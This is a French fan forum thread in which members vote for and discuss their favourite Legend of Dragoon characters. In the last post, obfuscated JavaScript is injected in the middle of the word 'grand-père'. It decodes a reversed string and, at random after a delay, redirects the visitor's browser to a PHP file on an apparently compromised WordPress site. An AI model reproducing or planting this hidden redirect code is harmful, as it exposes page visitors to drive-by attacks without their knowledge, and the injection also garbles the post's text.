Vos personnages préférés

Pour parler du jeu
Répondre

Quels sont vos personnages préférés?

Dart
4
15%
Lavitz
5
19%
Shana
2
8%
Rose
3
12%
Albert
1
4%
Haschel
2
8%
Kongol
1
4%
Meru
4
15%
Miranda
1
4%
Lloyd
3
12%
 
Nombre total de votes : 26
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Vos personnages préférés

Message par Septine Madrona »

Quels sont vos personnages préférés? Plusieurs choix possibles.
Merci d'expliquer vos choix quand vous votez.

Pour ma part, j'aime tous les personnages, mais j'ai une petite préférence pour Rose et Miranda (j'aime bien la rivalité qu'il y a entre elles).

Rose pour son côté sombre et mystérieux. J'aime sa personnalité et son style.
Miranda pour sa force de caractère, et pour son passé. Elle a su se faire une place au sein du groupe.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Vos personnages préférés

Message par yami627 »

a voter ^^ bon bah moi comme mon avatar et ma signature le montre, j'adore Meru lol elle est trop marrante et trop mignonne et malgré ça, elle a un lourd secrets sur les épaules.

Et rose, pour sa force, son coté fragile qu'elle cache derrière son mauvais caractère et surtout pour ses remarques franches XD
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Vos personnages préférés

Message par Lloyd »

Moi j'ai voté pour Lloyd (surprenant non?) et Lavitz , que des perso en L

Pour Lavitz je ne me souviens plus exactement de ses répliques dans le jeu mais je me rappel que j'aimais bien son caractère et son sens de l'honneur, un personnage très attachant.

Pour Lloyd ben il a trop la classe quoi :D il est très mystérieux et ténébreux et en plus il a les cheveux argenté c'est la classe ultime !
Image
Avatar du membre
deftoto
Jeune Dragon
Jeune Dragon
Messages : 6
Enregistré le : 27 avr. 2011, 16:16

Re: Vos personnages préférés

Message par deftoto »

Moi c'est Haschel.
J'adore sa façon de combattre et il est aussi tres equilibrée niveau des stats
Son caractére est pas mal non plus
Et puis il est cool
Voila tout est dit
:ugeek: :ugeek:
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Vos personnages préférés

Message par Gatsu »

Pour ma part j'ai pris Lloyd , Lavitz et Dart ^^ , on est pas loin du même vote lloyd ! Même si c'est vrai que tous les personnages sont attachant ( j'aurais pu mettre rose je pense dans le lot ) .
Lloyd j'adore d'abord parcque le perso en jette ! et ensuite parcqu'il suit ses convictions jusqu'au bout quitte a tout sacrifier sur son passage !
Lavitz pareil que toi Lloyd sauf que tu as omis un détail ! Il adore sa maman ! :D
Et Dart parcqu'il est spontanné ,vif , il claque niveau design et puis il a le coeur sur la main malgré tout
Avatar du membre
Kelevra
Dragon de Jade
Dragon de Jade
Messages : 56
Enregistré le : 04 mai 2011, 05:30
Localisation : Canada, Montréal

Re: Vos personnages préférés

Message par Kelevra »

LONGUE VIE À LAVITZ, mais c'est vraiment mon personnage préféré. Jai toujour trouvé que le personnage Albert ne lui arrivait pas à la cheville. Surtout avec la deuxième attaque du dragoon de vent qui change son nom de tempête de fleur à tempête de rose.

sinon après vien Dart puisque par rapport aux autre personnage, il les surpasses sur tout les points.
Puis Loyd pour son caractère mystérieur.(un peu dessus du combat contre lui, trop facile)
et pour finir Haschel puisque je suis un fan d'arts martiaux depuis que je suis tout jeune.
Vi Veri Veniversum Vivus Vici
Avatar du membre
kiki15
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 16
Enregistré le : 08 mai 2011, 15:02
Localisation : Bretagne

Re: Vos personnages préférés

Message par kiki15 »

Mon préféré c'est Lavitz biensûr et je crois que tout a été dit. Un personnage droit, protecteur et qui est proche de sa mère. Le second personnage c'est Méru, jeune, enthousiaste et dynamique, toujours prête à s'amuser mais ne se laisse pas marcher sur les pieds. Enfin Dart car le personnage principal de l'histoire, belle gueule et bonne présence.
Avatar du membre
-Su-
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 33
Enregistré le : 24 mai 2013, 18:06

Re: Vos personnages préférés

Message par -Su- »

J'adore Haschel et Méru, mais puisqu'il fallait faire un choix, j'ai donné mon vote à la petite volienne. J'adore son énergie, sa joie de vivre et sa détermination. Malgré son jeune âge, elle tient tête à tout son village en décidant de partir explorer le monde humain. Elle a en somme beaucoup des qualités que j'apprécie moi-même particulièrement chez une fille. C'est quelqu'un qui s'efforce de contaminer les autres avec son sourire, tout en ayant un caractère bien affirmé. C'est justement ce qu'a trop peu Shana. Elle est toute mignonne, mais vraiment trop ennuyeuse. Comme si une fille amoureuse devenait forcément niaise ! Il suffit de la voir à Lohan lorsqu'elle joue avec Dart, quoi qu'il dise, quoi qu'il fasse, elle beigne dans une béatitude idiote ! Méru donne déjà une image plus émancipatrice de la femme ! Si Méru vivait parmi nous, elle serait traveleuse !

Quant à Haschel, j'adore son humour léger comme son côté sérieux lorsqu'il s'agit de sa fille ou du destin du monde. Le vrai sage est celui qui vit simplement, et Haschel est tout-à-fait là-dedans. Et son statut de maître de l'art de Rouge termine de le rendre vraiment classe.
"Oeil de l'âme, éveille-toi !"
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Vos personnages préférés

Message par Septine Madrona »

Pour les votes, plusieurs choix étaient possibles si tu voulais.
Pour ma part, j'aurai bien aimé avoir un gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and-père comme Haschel.
C'est vrai que Meru respire la joie de vivre jusqu'à en devenir presque agaçante, mais on l'adore! ^^
Du coup, on connaît ton genre de fille ;)
Image
Répondre